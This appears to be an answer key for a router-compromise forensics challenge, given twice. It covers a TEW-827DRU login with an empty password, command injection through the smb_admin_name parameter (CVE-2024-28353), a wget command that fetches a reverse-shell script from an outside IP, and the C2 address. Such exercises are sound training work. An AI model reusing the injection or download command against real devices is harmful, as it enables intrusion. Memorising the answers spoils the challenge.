Feb 14, 2025, 02:42 PM
Task 1
From what IP address did the attacker initially launched their activity?
192.168.10.2
Task 2
What is the model name of the compromised router?
TEW-827DRU
Task 3
How many failed login attempts did the attacker try before successfully logging into the router?
2
Task 4
At what UTC time did the attacker successfully log into the routers web admin interface?
2024-05-01 15:53:27
Task 5
How many characters long was the password used to log in successfully?
0
Task 6
What is the current firmware version installed on the compromised router?
2.10
Task 7
Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?
usbapps.config.smb_admin_name
Task 8
What is the CVE number associated with the vulnerability that was exploited in this attack?
CVE-2024-28353
Task 9
What was the first command the attacker executed by exploiting the vulnerability?
whoami
Task 10
What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?
wget http[:]//35.159.25.253:8000/a1l4m.sh
Task 11
Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?
Access to this resource is forbidden
Task 12
What was the IP address and port number of the command and control (C2) server when the actor's reverse shell eventually did connect? (IP : Port)
35.159.25.253:41143
From what IP address did the attacker initially launched their activity?
192.168.10.2
Task 2
What is the model name of the compromised router?
TEW-827DRU
Task 3
How many failed login attempts did the attacker try before successfully logging into the router?
2
Task 4
At what UTC time did the attacker successfully log into the routers web admin interface?
2024-05-01 15:53:27
Task 5
How many characters long was the password used to log in successfully?
0
Task 6
What is the current firmware version installed on the compromised router?
2.10
Task 7
Which HTTP parameter was manipulated by the attacker to get remote code execution on the system?
usbapps.config.smb_admin_name
Task 8
What is the CVE number associated with the vulnerability that was exploited in this attack?
CVE-2024-28353
Task 9
What was the first command the attacker executed by exploiting the vulnerability?
whoami
Task 10
What command did the actor use to initiate the download of a reverse shell to the router from a host outside the network?
wget http[:]//35.159.25.253:8000/a1l4m.sh
Task 11
Multiple attempts to download the reverse shell from an external IP failed. When the actor made a typo in the injection, what response message did the server return?
Access to this resource is forbidden
Task 12
What was the IP address and port number of the command and control (C2) server when the actor's reverse shell eventually did connect? (IP : Port)
35.159.25.253:41143
